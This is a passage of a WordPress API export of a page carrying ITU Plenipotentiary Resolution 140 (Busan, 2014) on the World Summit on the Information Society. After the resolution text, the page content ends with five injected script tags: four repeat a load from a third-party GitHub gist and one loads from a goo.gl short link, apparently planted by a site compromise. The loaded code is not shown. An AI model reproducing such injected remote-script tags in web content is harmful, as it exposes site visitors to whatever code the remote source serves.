(Rev. 2011) and 1334 (Rev. 2013);<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">d)        programmes, activities and regional activities established by WTDC\u201114 with the objective of bridging the digital divide;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">e)        the relevant work already undertaken and\/or to be carried out by ITU in implementing the WSIS outcomes, under the aegis of WG-WSIS and the WSIS Task Force;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">f)        Resolution 75 ( Rev. Dubai, 2012) of the World Telecommunication Standardization Assembly (WTSA), on ITU\u2011T&#8217;s contribution in implementing the outcomes of WSIS,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">recognizing<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        the importance of ITU&#8217;s role and participation in UNGIS, as a permanent member, and sharing a rotating chairmanship;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b)        ITU&#8217;s commitment to the implementation of the goals and objectives of WSIS, as one of the most important goals for the Union;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c)        that the United Nations General Assembly, in its Resolution 68\/302, on the modalities for the overall review of WSIS outcomes, decided to conduct an overall review of the implementation of the WSIS outcomes in December 2015,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">resolves<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1        that ITU should play a leading facilitating role in the implementation process, along with UNESCO and UNDP, as stated in \u00a7 109 of the Tunis Agenda;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2        that ITU should continue to coordinate WSIS Forums, World Telecommunication and Information Society Day (WTISD), WSIS Project Prizes and maintain the WSIS Stocktaking database, subject to the outcomes of the UNGA overall review in December 2015;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">3        that ITU should continue to play a lead facilitation role in the WSIS implementation process, as a moderator\/facilitator for implementing Action Lines C2, C5 and C6;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">4        that ITU should continue carrying out those activities that come within its mandate, and participate with other stakeholders, as appropriate, in the implementation of Action Lines C1, C3, C4, C7, C8, C9 and C11 and all other relevant action lines and other WSIS outcomes, within the financial limits set by the Plenipotentiary Conference;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">5        that ITU should continue to adapt itself, taking into account technological developments and its potential to contribute significantly to building an inclusive information society and to the Post-2015 Development Agenda;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">6        that, when continuing its WSIS-related activity, ITU should take into consideration the outcomes of the UNGA overall review of implementation of the WSIS outcomes in 2015;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">7        to express its satisfaction with the successful outcomes of the Summit, in which the expertise and core competence of ITU were noted several times;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">8        to express its satisfaction with the successful outcomes of the WSIS+10 High-Level Event to review implementation of WSIS outcomes, at which the importance of collaboration among United Nations agencies, governments and relevant stakeholders was noted several times;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">9        to express its satisfaction and appreciation for ITU&#8217;s efforts to initiate and coordinate the WSIS+10 Multistakeholder Preparatory Platform (MPP) and WSIS+10 High-Level Event in close collaboration with other relevant United Nations agencies and relevant stakeholders;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">10        to express its satisfaction and appreciation for the efforts and contributions of other relevant United Nations agencies and all other stakeholders during the WSIS+10 MPP and the WSIS+10 High-Level Event;<\/div>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">11        to endorse the following outcome documents of the WSIS+10 High-Level Event:<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013        WSIS+10 Statement on the Implementation of the WSIS Outcomes;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2013        WSIS+10 Vision for WSIS beyond 2015;<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">12        to submit to the December 2015 UNGA Overall Review the successful outcomes of the ITU\u2011coordinated WSIS+10 High-Level Event elaborated through its MPP;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">13        to express its thanks to the staff of the Union, the host countries and WG-WSIS for their efforts in the preparation of both phases of WSIS (Geneva, 2003 and Tunis, 2005) and the WSIS+10 High-Level Event (Geneva, 2014), as well as all members of ITU actively involved in implementing the WSIS outcomes;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">14        that ITU, in coordination with UNESCO, UNCTAD and UNDP, contribute on the issue of ICT for development in the debate on the Post-2015 Development Agenda arranged by the United Nations General Assembly, taking into consideration the WSIS+10 High-Level Event outcome documents, with a focus on bridging the digital divide through sustainable development;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">15        that there is a need to integrate the implementation of the Dubai Action Plan, and in particular Resolution 30 (Rev. Dubai, 2014) of WTDC, and relevant resolutions of plenipotentiary conferences, with the multistakeholder implementation of the WSIS outcomes;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">16        that ITU should, within available resources, continue to maintain the current public WSIS stocktaking database, as one of the valuable tools for assisting with the follow-up of WSIS, as instructed in \u00a7 120 of the Tunis Agenda;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">17        that the ITU Telecommunication Development Sector (ITU\u2011D) shall give high priority to building information and communication infrastructure (WSIS Action Line C2), this being the physical backbone for all e\u2011applications, having regard to the Dubai Declaration and Objective 2 of the Dubai Action Plan and calling upon the ITU\u2011D study groups to do the same;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">18        to endorse the WSIS+10 Report: ITU&#8217;s Ten Year Contribution to the WSIS Implementation and Follow-up (2005-2014);<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">19        that UNGA be encouraged to consider the WSIS+10 High-Level Event outcome documents, which were developed through the MPP, which takes stock of the progress made in the implementation of the Geneva 2003 outcomes and addresses potential ICT gaps and areas for continued focus, as well as addressing challenges, including bridging the digital divide, and harnessing ICTs for development;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">20        that ITU should submit a progress report on the implementation of WSIS outcomes concerning ITU to the ITU Plenipotentiary Conference in 2018,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">instructs the Secretary-General<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1        to present to UNGA, within the modalities established by UNGA Resolution 68\/302, the WSIS+10 Report: ITU&#8217;s Ten Year Contribution to the WSIS Implementation and Follow-up (2005-2014), which was provided as an input to the Committee on Science and Technology Development (CSTD) review;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2        to support ITU&#8217;s role in implementing the WSIS outcomes and the Post-2015 Development Agenda, as established by Member States;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">3        to submit the WSIS+10 High-Level Event outcome documents as a contribution to the UNGA overall review in 2015;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">4        to prepare a report on the UNGA overall review of WSIS at the first Council session after the latter&#8217;s adoption,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">instructs the Secretary-General and the Directors of the Bureaux<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1        to take all necessary measures for ITU to fulfil its role, as outlined in resolves 1, 2, 3, and 4 above, in accordance with the appropriate roadmaps;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2        to continue to coordinate, with the WSIS Task Force, the activities related to WSIS implementation for implementing resolves 1, 2, 3, and 4 above, with the aim of avoiding duplication of work among the ITU Bureaux and the ITU General Secretariat;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">3        to continue to raise public awareness of the Union&#8217;s mandate, role and activities and provide broader access to the Union&#8217;s resources for the general public and other actors involved in the emerging information society;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">4        to formulate specific tasks and deadlines for implementing the action lines referred to above, and incorporate them in the operational plans of the General Secretariat and the Sectors;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">5        to report annually to the Council on the activities undertaken on these subjects, including their financial implications;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">6        to prepare and submit a progress report on the ITU activities for WSIS implementation to the next plenipotentiary conference in 2018, taking into account the UNGA overall review in December 2015;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">7        to ensure that the ITU participates actively, provision of its expertise and competency, in the UNGA overall review, in accordance with the modalities established by UNGA Resolution 68\/302,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">instructs the Directors of the Bureaux<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">to ensure that concrete objectives and deadlines (using results-based management processes) for WSIS activities are developed and reflected in the operational plans of each Sector,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">instructs the Director of the Telecommunication Development Bureau<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">to follow, as soon as possible and in accordance with Resolution 30 (Rev. Dubai, 2014), a partnership approach in ITU\u2011D activities related to its roles in the implementation and follow-up of the WSIS outcomes, in accordance with the provisions of the ITU Constitution and ITU Convention, and to report annually, as appropriate, to the Council,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">requests the Council<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1        to oversee, consider and discuss, as appropriate, ITU&#8217;s implementation of the WSIS outcomes and related ITU activities, and, within the financial limits set by the Plenipotentiary Conference, to make resources available as appropriate;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2        to oversee ITU&#8217;s adaptation to the information society, in line with resolves 5 above;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">3        to maintain WG-WSIS, in order to facilitate membership input and guidance on the ITU implementation of relevant WSIS outcomes and to elaborate, in collaboration with other Council working groups, proposals to the Council that may be necessary for adapting ITU to its role in building the information society, with the assistance of the WSIS Task Force, these proposals possibly including amendments to the Constitution and the Convention;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">4        to take into account the relevant decisions of the United Nations General Assembly with regard to the overall review of implementation of the WSIS outcomes;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">5        to include the report of the Secretary-General in the documents sent to Member States in accordance with No. 81 of the Convention;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">6        to take all necessary measures, as appropriate, in follow-up to the results of the UNGA overall review of the implementation of the WSIS outcomes, within the financial limits set by the Plenipotentiary Conference;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">7        to encourage the participation of the ITU membership and other relevant stakeholders in ITU&#8217;s activities that support WSIS implementation, as appropriate,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">invites Member States, Sector Members, Associates and Academia<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1        to participate actively in implementing WSIS outcomes, contribute to the WSIS Forum and WSIS Stocktaking database maintained by ITU and the WSIS Project Prizes, and participate actively in the activities of WG-WSIS and in ITU&#8217;s further adaptation to the information society;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2        to participate actively in the preparatory process for the UNGA overall review of the WSIS outcomes, according to the rules and procedures of UNGA, and to promote ITU&#8217;s activities in this regard and the outcomes of the WSIS+10 High-Level Event;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">3        to support, through relevant UN processes, the creation of synergies and institutional linkages between WSIS and the Post-2015 Development Agenda, so as to continue strengthening the impact of ICT for sustainable development;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">4        to make voluntary contributions to the special trust fund set up by ITU to support activities relating to the implementation of WSIS outcomes;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">5         to continue to contribute information on their activities to the public WSIS stocktaking database maintained by ITU;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">6        to contribute to and closely collaborate with the Partnership on Measuring ICT for Development as an international, multistakeholder initiative to improve the availability and quality of ICT data and indicators, particularly in developing countries,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">resolves to express<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1        its warmest thanks and deepest gratitude to the Governments of Switzerland and Tunisia for having hosted the two phases of the Summit in close collaboration with ITU, UNESCO, UNCTAD and other relevant United Nations agencies;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2        its appreciation for the WSIS+10 High-Level Event, coordinated and hosted by ITU and co\u2011organized by ITU, UNESCO, UNCTAD and UNDP with the engagement of other United Nations agencies.<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>PP RESOLUTION 140 (Rev. Busan, 2014) ITU&#8217;s role in implementing the outcomes of the World Summit on the Information Society and in the overall review by United Nations General Assembly of their implementation The Plenipotentiary Conference of the International Telecommunication Union ( Busan, 2014), recalling a) Resolution 73 (Minneapolis, 1998) of the Plenipotentiary Conference, which [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1668,"menu_order":140,"comment_status":"open","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-1679","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1679","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/comments?post=1679"}],"version-history":[{"count":0,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1679\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1668"}],"wp:attachment":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/media?parent=1679"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}